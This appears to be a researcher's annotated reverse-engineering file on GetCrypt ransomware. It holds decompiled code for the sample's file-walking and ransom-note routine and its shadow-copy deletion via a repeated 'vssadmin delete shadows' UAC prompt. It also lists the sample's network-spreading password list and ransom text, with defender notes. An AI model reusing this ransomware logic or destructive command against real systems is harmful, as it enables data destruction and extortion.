Malware-Misc-RE/2019-05-22-rigek-gercrypt-ransomware-vk-notes.cpp
| /* | |
| RIGEK -> GETCRYPT RANSOMWARE | |
| MD5: e8a3d9203c5c41a47f78f984aa722038 | |
| (unpacked) | |
| https://www.virustotal.com/#/file/3ee4607ed06c270fdf9ddfde65da676d2547607bad420a8114767309b17adfeb/detection | |
| h/t @nao_sec | |
| https://twitter.com/nao_sec/status/1131172350416711680 | |
| Usual Windows Crypto API with key | |
| WHITELISTED LOCATIONS: | |
| C:\Windows\System32 | |
| C:\Windows\System32\svchost.exe | |
| :\$Recycle.Bin | |
| :\ProgramData | |
| :\Users\All Users | |
| :\Program Files | |
| :\Local Settings | |
| :\Windows | |
| :\Boot | |
| :\System Volume Information | |
| :\Recovery | |
| AppData | |
| NETWORK SPREADING CREDENTIALS (WNetAddConnection2W | WNetEnumResourceW) | |
| admin | |
| administrator | |
| Administrator | |
| test | |
| 1111 | |
| 11111 | |
| 111111 | |
| Guest | |
| Home | |
| root | |
| developer | |
| r00t | |
| ro0t | |
| r0ot | |
| qwerty | |
| 1234 | |
| 12345 | |
| 123456 | |
| 1234567 | |
| 12345678 | |
| 123456789 | |
| 1234567890 | |
| */ | |
| // FILE TRAVERSAL FUNCTION | |
| /* | |
| Recursive directory walker (Hex-Rays output of the 32-bit sample). | |
| `this` is a wide-char directory path. For that directory the routine | |
| (1) writes the ransom note "<dir>\# DECRYPT MY FILES #.txt" from the | |
| ten string lines v30..v39, then (2) enumerates "<dir>\*": | |
| subdirectories are recursed into unless their full path contains one | |
| of the 10 strings at off_4049CC (presumably the whitelist in the | |
| header above -- table not visible here), and entries passing the | |
| attribute mask are handed to sub_401E40 (presumably the per-file | |
| encryption routine; not in this listing). | |
| Returns HeapFree's BOOL on the normal path, or 0 when the second | |
| buffer allocation fails; the recursive caller ignores it. | |
| Decompiler artifacts: GetProcessHeap takes no arguments, so the | |
| "8, 65598" pairs are HeapAlloc's flags (8 == HEAP_ZERO_MEMORY) and | |
| size pushed before the call; v4/v5, v14/v15, v17/v18 and v25/v26 are | |
| the same unrecovered stack arguments for HeapAlloc / HeapFree. | |
| Defender note: the per-directory artifact observable on disk is the | |
| note file named above, created in every directory that is walked. | |
| */ | |
| int __thiscall sub_401FC0(void *this) | |
| { | |
| void *v1; // edi@1 | |
| int v2; // eax@1 | |
| int (__stdcall *v3)(int, int, int); // esi@1 | |
| int v4; // ST14_4@1 | |
| int v5; // ST18_4@1 | |
| int v6; // eax@1 | |
| int v7; // ebx@1 | |
| int v8; // ebx@2 | |
| unsigned int v9; // esi@3 | |
| const char *v10; // edi@4 | |
| int v11; // ST10_4@5 | |
| int (__cdecl *v12)(signed int, signed int); // edi@9 | |
| int v13; // eax@9 | |
| int v14; // ST14_4@9 | |
| int v15; // ST18_4@9 | |
| int v16; // eax@11 | |
| int v17; // ST14_4@11 | |
| int v18; // ST18_4@11 | |
| int result; // eax@11 | |
| int v20; // edi@11 | |
| int (__stdcall *v21)(char *, const wchar_t *); // esi@13 | |
| char v22; // al@14 -- low byte of dwFileAttributes | |
| unsigned int v23; // esi@17 | |
| int v24; // eax@28 | |
| int v25; // ST14_4@28 | |
| int v26; // ST18_4@28 | |
| int v27; // [sp+18h] [bp-284h]@2 -- reused slot: WriteFile byte count, then the find handle | |
| void *v28; // [sp+1Ch] [bp-280h]@1 -- copy of `this` (directory path) | |
| int v29; // [sp+20h] [bp-27Ch]@1 -- note-path buffer | |
| const char *v30; // [sp+24h] [bp-278h]@2 -- v30..v39: the ten ransom-note lines, contiguous 4-byte slots | |
| const char *v31; // [sp+28h] [bp-274h]@2 | |
| const char *v32; // [sp+2Ch] [bp-270h]@2 | |
| const char *v33; // [sp+30h] [bp-26Ch]@2 | |
| const char *v34; // [sp+34h] [bp-268h]@2 | |
| const char *v35; // [sp+38h] [bp-264h]@2 | |
| const char *v36; // [sp+3Ch] [bp-260h]@2 | |
| const char *v37; // [sp+40h] [bp-25Ch]@2 | |
| const char *v38; // [sp+44h] [bp-258h]@2 | |
| const char *v39; // [sp+48h] [bp-254h]@2 | |
| int v40; // [sp+4Ch] [bp-250h]@12 -- WIN32_FIND_DATAW; v40 itself is dwFileAttributes | |
| char v41; // [sp+78h] [bp-224h]@14 -- offset 0x2C into v40 == cFileName | |
| v1 = this; | |
| v28 = this; | |
| v2 = GetProcessHeap(8, 65598); // 8 / 65598 are HeapAlloc's flags and size (see header) | |
| v3 = HeapAlloc; | |
| v6 = HeapAlloc(v2, v4, v5); // buffer for the note path; v4/v5 unrecovered (flags, size) | |
| v7 = v6; | |
| v29 = v6; | |
| if ( v6 ) | |
| { | |
| v30 = " Attention! Your computer has been attacked by virus-encoder!\r\n"; | |
| v31 = " All your files are now encrypted using cryptographycalli strong aslgorithm.\r\n"; | |
| v32 = " Without the original key recovery is impossible.\r\n"; | |
| v33 = "\r\n"; | |
| v34 = "TO GET YOUR DECODER AND THE ORIGINAL KEY TO DECRYPT YOUR FILES YOU NEED TO EMAIL US AT: GETCRYPT@COCK.LI\r\n"; | |
| v35 = "\r\n"; | |
| v36 = "It is in your interest to respond as soon as possible to ensure the restoration of your files.\r\n"; | |
| v37 = "\r\n"; | |
| v38 = "P.S only in case you do not recive a response from the first email address within 48 hours,\r\n"; | |
| v39 = "please use this alternative email address: CRYPTGET@TUTANOTA.COM\r\nYour UID:\r\n%key%\r\n"; | |
| v27 = 0; | |
| // Note path "<this>\# DECRYPT MY FILES #.txt"; 0x7FFF is the wnsprintfW character limit | |
| wnsprintfW(v6, 0x7FFF, (const char *)L"%s\\%s.txt", v1, L"# DECRYPT MY FILES #"); | |
| // GENERIC_WRITE, FILE_SHARE_READ, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL; -1 == INVALID_HANDLE_VALUE | |
| v8 = CreateFileW(v7, 0x40000000, 1, 0, 4, 128, 0); | |
| if ( v8 != -1 ) | |
| { | |
| v9 = 0; | |
| // Write the ten note lines in order. The line containing "%key%" (v39) is replaced | |
| // by the global buffer dword_406018 of length dword_406024 -- presumably the | |
| // victim-specific UID filled in elsewhere; its contents are not visible here. | |
| do | |
| { | |
| // &v30 indexed as an array over the contiguous slots v30..v39; the "4 *" scale | |
| // looks like a decompiler artifact (the slots are 4 bytes apart, one per line). | |
| v10 = (&v30)[4 * v9]; | |
| if ( StrStrA((&v30)[4 * v9], "%key%") ) | |
| { | |
| WriteFile(v8, dword_406018, dword_406024, &v27, 0); // v27 == lpNumberOfBytesWritten here | |
| } | |
| else | |
| { | |
| v11 = lstrlenA(v10); | |
| WriteFile(v8, v10, v11, &v27, 0); | |
| } | |
| ++v9; | |
| } | |
| while ( v9 < 0xA ); // 10 lines | |
| CloseHandle(v8); | |
| v3 = HeapAlloc; | |
| } | |
| v12 = GetProcessHeap; | |
| v13 = GetProcessHeap(0, v29); // 0 / v29 are HeapFree's flags and pointer (decompiler misattribution) | |
| HeapFree(v13, v14, v15); // release the note-path buffer | |
| } | |
| else | |
| { | |
| v12 = GetProcessHeap; | |
| } | |
| // Second ~64 KiB buffer, used for the search pattern and then for each entry's full path | |
| v16 = v12(8, 65598); | |
| result = v3(v16, v17, v18); // HeapAlloc; result stays 0 (and is returned) if it fails | |
| v20 = result; | |
| if ( result ) | |
| { | |
| wnsprintfW(result, 0x7FFF, (const char *)L"%s\\*", v28); // "<dir>\*" | |
| v27 = FindFirstFileW(v20, &v40); // v27 now holds the find handle | |
| if ( v27 != -1 ) | |
| { | |
| v21 = (int (__stdcall *)(char *, const wchar_t *))lstrcmpW; | |
| do | |
| { | |
| wnsprintfW(v20, 0x7FFF, (const char *)L"%s\\%s", v28, &v41); // full path of the current entry | |
| v22 = v40; | |
| if ( v40 & 0x10 ) // 0x10 == FILE_ATTRIBUTE_DIRECTORY | |
| { | |
| if ( v21(&v41, L"..") && v21(&v41, L".") ) // skip "." and ".." | |
| { | |
| v23 = 0; | |
| // Recurse only when the full path contains none of the 10 strings at | |
| // off_4049CC; a match exits this loop without recursing and falls | |
| // through to the attribute check below. | |
| while ( !StrStrW(v20, off_4049CC[v23]) ) | |
| { | |
| ++v23; | |
| if ( v23 >= 10 ) | |
| { | |
| sub_401FC0(v20); | |
| goto LABEL_26; | |
| } | |
| } | |
| } | |
| v22 = v40; | |
| } | |
| // 0xA7 == READONLY|HIDDEN|SYSTEM|ARCHIVE|NORMAL on the low attribute byte (v22 is char). | |
| // Entries whose name contains dword_406014 (presumably the marker/extension of | |
| // already-encrypted files; not visible here) or the note name are skipped. A | |
| // directory entry that was not recursed into also reaches this check, so one | |
| // carrying e.g. the HIDDEN or SYSTEM bit passes the mask as well. | |
| if ( v22 & 0xA7 && !StrStrW(&v41, dword_406014) && !StrStrW(&v41, L"# DECRYPT MY FILES #") ) | |
| sub_401E40(v20); // presumably the per-file encryption routine (not in this listing) | |
| LABEL_26: | |
| v21 = (int (__stdcall *)(char *, const wchar_t *))lstrcmpW; | |
| } | |
| while ( FindNextFileW(v27, &v40) ); | |
| FindClose(v27); | |
| } | |
| v24 = GetProcessHeap(0, v20); // 0 / v20 are HeapFree's flags and pointer (decompiler misattribution) | |
| result = HeapFree(v24, v25, v26); // release the path buffer; result becomes HeapFree's BOOL | |
| } | |
| return result; | |
| } | |
| // VSSADMIN | |
| /* | |
| Shadow-copy deletion (Hex-Rays output). Runs | |
| "vssadmin.exe delete shadows /all /quiet" from C:\Windows\System32 via | |
| ShellExecuteExW with the "runas" verb, i.e. through a UAC elevation | |
| prompt, and re-issues the call until it returns non-zero -- | |
| ShellExecuteExW returns FALSE when the prompt is declined, so the | |
| user is prompted repeatedly until elevation is granted or the call | |
| otherwise succeeds. Under WOW64 (32-bit process on 64-bit Windows) | |
| file-system redirection is disabled first so the native | |
| System32\vssadmin.exe is resolved, and restored afterwards. | |
| v2..v10 are the leading fields of a SHELLEXECUTEINFOW built on the | |
| stack (cbSize = 60 == 0x3C); the remaining fields up to bp-8 are not | |
| assigned in the decompiled output. | |
| Returns the last ShellExecuteExW result, or the result of | |
| Wow64RevertWow64FsRedirection when redirection was toggled. | |
| Detection: process creation of vssadmin.exe with these arguments | |
| from an unexpected parent is a well-known pre-encryption indicator. | |
| */ | |
| int sub_401000() | |
| { | |
| int v0; // eax@1 | |
| int result; // eax@4 | |
| int v2; // [sp+0h] [bp-44h]@3 -- SHELLEXECUTEINFOW.cbSize | |
| int v3; // [sp+4h] [bp-40h]@3 -- fMask | |
| int v4; // [sp+8h] [bp-3Ch]@3 -- hwnd | |
| const wchar_t *v5; // [sp+Ch] [bp-38h]@3 -- lpVerb | |
| const wchar_t *v6; // [sp+10h] [bp-34h]@3 -- lpFile | |
| const wchar_t *v7; // [sp+14h] [bp-30h]@3 -- lpParameters | |
| const wchar_t *v8; // [sp+18h] [bp-2Ch]@3 -- lpDirectory | |
| int v9; // [sp+1Ch] [bp-28h]@3 -- nShow | |
| int v10; // [sp+20h] [bp-24h]@3 -- hInstApp | |
| int v11; // [sp+3Ch] [bp-8h]@1 -- OldValue for Wow64Disable/RevertWow64FsRedirection | |
| int v12; // [sp+40h] [bp-4h]@1 -- BOOL out-param of IsWow64Process | |
| v11 = 0; | |
| v12 = 0; | |
| v0 = GetCurrentProcess(); | |
| IsWow64Process(v0, &v12); // return value unchecked; v12 stays 0 if the call fails | |
| if ( v12 ) | |
| Wow64DisableWow64FsRedirection(&v11); // reach the 64-bit System32 from a 32-bit process | |
| v2 = 60; // cbSize == sizeof(SHELLEXECUTEINFOW) on 32-bit | |
| v3 = 64; // fMask == 0x40 == SEE_MASK_NOCLOSEPROCESS | |
| v4 = 0; // hwnd == NULL | |
| v5 = L"runas"; // request elevation (UAC prompt) | |
| v6 = L"vssadmin.exe"; | |
| v7 = L" delete shadows /all /quiet"; // leading space as in the binary | |
| v8 = L"C:\\Windows\\System32"; | |
| v9 = 0; // nShow == SW_HIDE | |
| v10 = 0; // hInstApp | |
| // Retry until ShellExecuteExW succeeds (e.g. the elevation prompt is accepted) | |
| do | |
| result = ShellExecuteExW(&v2); | |
| while ( !result ); | |
| if ( v12 ) | |
| result = Wow64RevertWow64FsRedirection(&v11); // restore redirection; overwrites result | |
| return result; | |
| } | |
| /* | |
| Attention! Your computer has been attacked by virus-encoder! | |
| All your files are now encrypted using cryptographycalli strong aslgorithm. | |
| Without the original key recovery is impossible. | |
| TO GET YOUR DECODER AND THE ORIGINAL KEY TO DECRYPT YOUR FILES YOU NEED TO EMAIL US AT: GETCRYPT@COCK.LI | |
| It is in your interest to respond as soon as possible to ensure the restoration of your files. | |
| P.S only in case you do not recive a response from the first email address within 48 hours, | |
| please use this alternative email address: CRYPTGET@TUTANOTA.COM | |
| */ |